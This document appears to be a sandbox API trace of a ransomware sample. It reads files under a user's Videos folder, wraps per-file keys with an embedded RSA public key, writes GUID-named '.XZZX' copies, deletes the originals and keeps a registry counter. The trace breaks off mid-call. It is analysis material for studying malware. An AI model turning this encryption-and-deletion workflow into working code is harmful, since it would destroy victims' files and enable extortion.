[0131.802] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.802] CloseHandle (hObject=0x698) returned 1 [0131.807] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0131.807] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0131.807] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\wMr3QKnu.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\2ss69ds5b7dlsjshty0o\\wmr3qknu.mp4")) returned 1 [0131.808] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\wMr3QKnu.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\2ss69ds5b7dlsjshty0o\\wmr3qknu.mp4")) returned 0 Thread: id = 446 os_tid = 0xa48 [0131.809] lstrcpyA (in: lpString1=0x434fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0131.809] lstrcpyW (in: lpString1=0x434f460, lpString2="5Cc08SMWT PKYNwSj.swf" | out: lpString1="5Cc08SMWT PKYNwSj.swf") returned="5Cc08SMWT PKYNwSj.swf" [0131.809] lstrcpyW (in: lpString1=0x434e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\" [0131.809] SetErrorMode (uMode=0x1) returned 0x1 [0131.809] lstrcpyW (in: lpString1=0x434f860, lpString2="5Cc08SMWT PKYNwSj.swf" | out: lpString1="5Cc08SMWT PKYNwSj.swf") returned="5Cc08SMWT PKYNwSj.swf" [0131.809] CoCreateGuid (in: pguid=0x434e440 | out: pguid=0x434e440*(Data1=0x961b0096, Data2=0x7d93, Data3=0x4ed3, Data4=([0]=0xa3, [1]=0x1a, [2]=0xe7, [3]=0x82, [4]=0x4, [5]=0x80, [6]=0x56, [7]=0x6a))) returned 0x0 [0131.809] wsprintfW (in: param_1=0x434ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\5Cc08SMWT PKYNwSj.swf") returned 88 [0131.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x434fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0131.809] wsprintfW (in: param_1=0x434e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\60CA942226AA4A29961B00962ADF2E71.XZZX") returned 104 [0131.809] StrStrW (lpFirst="5Cc08SMWT PKYNwSj.swf", lpSrch="XZZX") returned 0x0 [0131.809] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\5Cc08SMWT PKYNwSj.swf", dwFileAttributes=0x20) returned 1 [0131.810] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\5Cc08SMWT PKYNwSj.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\o903hcw\\5cc08smwt pkynwsj.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6ac [0131.810] ReadFile (in: hFile=0x6ac, lpBuffer=0x3cf8f20, nNumberOfBytesToRead=0x4f3d, lpNumberOfBytesRead=0x434e418, lpOverlapped=0x0 | out: lpBuffer=0x3cf8f20*, lpNumberOfBytesRead=0x434e418*=0x4f3d, lpOverlapped=0x0) returned 1 [0131.811] CloseHandle (hObject=0x6ac) returned 1 [0131.811] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0131.812] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40a0000 [0131.812] SetErrorMode (uMode=0x1) returned 0x1 [0131.812] lstrcpyW (in: lpString1=0x434e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0131.812] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cf7620) returned 1 [0131.814] CryptGenKey (in: hProv=0x3cf7620, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3d10f18) returned 1 [0132.077] CryptExportKey (in: hKey=0x3d10f18, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x434e41c | out: pbData=0x0*, pdwDataLen=0x434e41c*=0x94) returned 1 [0132.077] CryptExportKey (in: hKey=0x3d10f18, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40a0000, pdwDataLen=0x434e41c | out: pbData=0x40a0000*, pdwDataLen=0x434e41c*=0x94) returned 1 [0132.077] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0132.078] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0132.078] CryptDestroyKey (hKey=0x3d10f18) returned 1 [0132.078] CryptReleaseContext (hProv=0x3cf76a8, dwFlags=0x0) returned 0 [0132.078] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\60CA942226AA4A29961B00962ADF2E71.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\o903hcw\\60ca942226aa4a29961b00962adf2e71.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6c4 [0132.122] WriteFile (in: hFile=0x6c4, lpBuffer=0x3cf8f20*, nNumberOfBytesToWrite=0x4f3d, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3cf8f20*, lpNumberOfBytesWritten=0x434e438*=0x4f3d, lpOverlapped=0x0) returned 1 [0132.123] SetFilePointer (in: hFile=0x6c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4f3d [0132.123] WriteFile (in: hFile=0x6c4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0132.124] SetFilePointer (in: hFile=0x6c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4f42 [0132.124] WriteFile (in: hFile=0x6c4, lpBuffer=0x434f860*, nNumberOfBytesToWrite=0x2a, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x434f860*, lpNumberOfBytesWritten=0x434e438*=0x2a, lpOverlapped=0x0) returned 1 [0132.124] SetFilePointer (in: hFile=0x6c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4f6c [0132.124] WriteFile (in: hFile=0x6c4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0132.124] SetFilePointer (in: hFile=0x6c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4f71 [0132.124] SetErrorMode (uMode=0x1) returned 0x1 [0132.124] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0132.124] OutputDebugStringW (lpOutputString="end") [0132.124] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v0\x88Ê\x03`Õ4\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0132.124] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x434dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8 | out: pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8) returned 1 [0132.124] CryptAcquireContextW (in: phProv=0x434d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x434d3e4*=0x3cf7730) returned 1 [0132.125] CryptImportPublicKeyInfo (in: hCryptProv=0x3cf7730, dwCertEncodingType=0x1, pInfo=0x3cf15e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cf1610*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cf1618*, PublicKey.cUnusedBits=0x0), phKey=0x434d3ec | out: phKey=0x434d3ec*=0x3d10f18) returned 1 [0132.125] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0132.126] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0132.126] CryptEncrypt (in: hKey=0x3d10f18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x434d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x434d3f0*=0x80) returned 1 [0132.126] CryptEncrypt (in: hKey=0x3d10f18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cf77b8*, pdwDataLen=0x434d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cf77b8*, pdwDataLen=0x434d3e8*=0x80) returned 1 [0132.126] WriteFile (in: hFile=0x6c4, lpBuffer=0x3cf77b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3cf77b8*, lpNumberOfBytesWritten=0x434e438*=0x80, lpOverlapped=0x0) returned 1 [0132.126] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0132.126] WriteFile (in: hFile=0x6c4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0132.126] GetUserNameW (in: lpBuffer=0x434e1f8, pcbBuffer=0x434dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x434dfe0) returned 1 [0132.126] wsprintfW (in: param_1=0x434dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0132.126] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe4 | out: phkResult=0x434dfe4*=0x6c8) returned 0x0 [0132.127] RegQueryValueExW (in: hKey=0x6c8, lpValueName="E1010314", lpReserved=0x0, lpType=0x434dfd8, lpData=0x434dfec, lpcbData=0x434dfdc*=0x4 | out: lpType=0x434dfd8*=0x4, lpData=0x434dfec*=0xb6, lpcbData=0x434dfdc*=0x4) returned 0x0 [0132.127] RegCloseKey (hKey=0x6c8) returned 0x0 [0132.127] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe8 | out: phkResult=0x434dfe8*=0x6c8) returned 0x0 [0132.127] RegSetValueExW (in: hKey=0x6c8, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x434dfec*=0xb7, cbData=0x4 | out: lpData=0x434dfec*=0xb7) returned 0x0 [0132.127] RegCloseKey (hKey=0x6c8) returned 0x0 [0132.127] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.127] VirtualFree (lpAddress=0x40a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.127] CloseHandle (hObject=0x6c4) returned 1 [0132.128] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0132.128] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0132.128] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\5Cc08SMWT PKYNwSj.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\o903hcw\\5cc08smwt pkynwsj.swf")) returned 1 [0132.129] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\5Cc08SMWT PKYNwSj.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\o903hcw\\5cc08smwt pkynwsj.swf")) returned 0 Thread: id = 447 os_tid = 0xa4c [0131.999] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0131.999] lstrcpyW (in: lpString1=0x420f460, lpString2="i2GwNYb4B.mp4" | out: lpString1="i2GwNYb4B.mp4") returned="i2GwNYb4B.mp4" [0131.999] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\" [0131.999] SetErrorMode (uMode=0x1) returned 0x1 [0131.999] lstrcpyW (in: lpString1=0x420f860, lpString2="i2GwNYb4B.mp4" | out: lpString1="i2GwNYb4B.mp4") returned="i2GwNYb4B.mp4" [0131.999] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xb3332d67, Data2=0xa755, Data3=0x4e49, Data4=([0]=0xb9, [1]=0xa7, [2]=0x73, [3]=0xf2, [4]=0xdb, [5]=0x6d, [6]=0xd4, [7]=0xda))) returned 0x0 [0131.999] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\i2GwNYb4B.mp4") returned 80 [0131.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0131.999] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\E29C4433332B9D3DB3332D67374C8185.XZZX") returned 104 [0131.999] StrStrW (lpFirst="i2GwNYb4B.mp4", lpSrch="XZZX") returned 0x0 [0131.999] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\i2GwNYb4B.mp4", dwFileAttributes=0x20) returned 1 [0132.036] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\i2GwNYb4B.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\o903hcw\\i2gwnyb4b.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6b8 [0132.036] ReadFile (in: hFile=0x6b8, lpBuffer=0x4367d60, nNumberOfBytesToRead=0x9ef8, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x4367d60*, lpNumberOfBytesRead=0x420e418*=0x9ef8, lpOverlapped=0x0) returned 1 [0132.037] CloseHandle (hObject=0x6b8) returned 1 [0132.037] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x40f0000 [0132.037] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4350000 [0132.038] SetErrorMode (uMode=0x1) returned 0x1 [0132.038] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0132.038] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cf76a8) returned 1 [0132.040] CryptGenKey (in: hProv=0x3cf76a8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3d11058) returned 1 [0132.201] CryptExportKey (in: hKey=0x3d11058, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0132.201] CryptExportKey (in: hKey=0x3d11058, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4350000, pdwDataLen=0x420e41c | out: pbData=0x4350000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0132.201] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0132.201] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0132.201] CryptDestroyKey (hKey=0x3d11058) returned 1 [0132.201] CryptReleaseContext (hProv=0x3cf7840, dwFlags=0x0) returned 0 [0132.201] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\E29C4433332B9D3DB3332D67374C8185.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\o903hcw\\e29c4433332b9d3db3332d67374c8185.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6b0 [0132.202] WriteFile (in: hFile=0x6b0, lpBuffer=0x4367d60*, nNumberOfBytesToWrite=0x9ef8, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x4367d60*, lpNumberOfBytesWritten=0x420e438*=0x9ef8, lpOverlapped=0x0) returned 1 [0132.202] SetFilePointer (in: hFile=0x6b0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9ef8 [0132.203] WriteFile (in: hFile=0x6b0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0132.203] SetFilePointer (in: hFile=0x6b0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9efd [0132.203] WriteFile (in: hFile=0x6b0, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x1a, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x1a, lpOverlapped=0x0) returned 1 [0132.203] SetFilePointer (in: hFile=0x6b0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9f17 [0132.203] WriteFile (in: hFile=0x6b0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0132.203] SetFilePointer (in: hFile=0x6b0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9f1c [0132.203] SetErrorMode (uMode=0x1) returned 0x1 [0132.203] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0132.203] OutputDebugStringW (lpOutputString="end") [0132.203] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v0\x88Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0132.203] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0132.203] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3cf78c8) returned 1 [0132.204] CryptImportPublicKeyInfo (in: hCryptProv=0x3cf78c8, dwCertEncodingType=0x1, pInfo=0x3cf16b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cf16e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cf16e8*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3d11058) returned 1 [0132.204] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0132.204] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0132.204] CryptEncrypt (in: hKey=0x3d11058, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0132.204] CryptEncrypt (in: hKey=0x3d11058, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cf7950*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cf7950*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0132.204] WriteFile (in: hFile=0x6b0, lpBuffer=0x3cf7950*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cf7950*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0132.204] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0132.204] WriteFile (in: 